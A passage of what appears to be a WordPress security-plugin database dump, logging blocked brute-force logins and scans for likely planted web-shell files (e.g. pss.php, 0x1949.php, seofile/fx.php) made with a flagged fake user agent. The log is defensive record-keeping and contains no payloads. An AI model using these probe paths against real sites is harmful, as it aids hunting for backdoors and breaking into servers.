User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(14809,0.000000,1704734412.004750,'\0\0\0\0\0\0\0\0\0\03[<',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15097,0.000000,1704840171.643322,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14505,1704638797.336236,1704638797.238500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/about.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14549,1704639185.777067,1704639185.676900,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14504,1704638802.188652,1704638802.094400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/about.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15143,1704849570.946773,1704849570.879400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(14503,1704638809.324278,1704638809.256100,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/phpversion.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocHZlcnNpb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14550,1704639181.401120,1704639181.315900,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14502,1704638815.680618,1704638815.576800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/phpversion.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocHZlcnNpb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15144,0.000000,1704849726.133050,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15145,0.000000,1704849969.438542,'\0\0\0\0\0\0\0\0\0\0v',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14808,1704734006.813287,1704734006.745800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/admin/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(14551,1704639173.818304,1704639173.747500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/pss.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Bzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14501,1704638821.828928,1704638821.732400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14811,1704734493.778966,1704734493.704900,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(14552,1704639168.909909,1704639168.833700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/pss.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Bzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14500,1704638826.350523,1704638826.265900,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14499,1704638832.400797,1704638832.312500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/11.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzExLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14807,1704734013.182212,1704734013.084600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/Admin/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(14498,1704638836.823808,1704638836.728100,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/11.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzExLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15146,0.000000,1704850093.702936,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14553,1704639158.170737,1704639158.080700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/seofile/css.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9maWxlL2Nzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14497,1704638843.111014,1704638843.011200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/xx.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3h4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15147,0.000000,1704850093.653809,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14496,1704638847.929936,1704638847.849500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/xx.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3h4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14806,1704734017.881846,1704734017.806800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/admin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15148,1704850612.724351,1704850612.627000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(14554,1704639152.282147,1704639152.186800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/seofile/fx.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9maWxlL2Z4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14495,1704638853.801169,1704638853.721400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/themes.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15149,1704850612.720775,1704850612.629000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15150,0.000000,1704850775.829205,'\0\0\0\0\0\0\0\0\0\0Y',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14812,1704734488.327515,1704734488.239900,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(14555,1704639147.369365,1704639147.317400,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/seofile/fx.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9maWxlL2Z4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14494,1704638857.640410,1704638857.566700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/themes.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14493,1704638864.980938,1704638864.895600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/0x1949.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 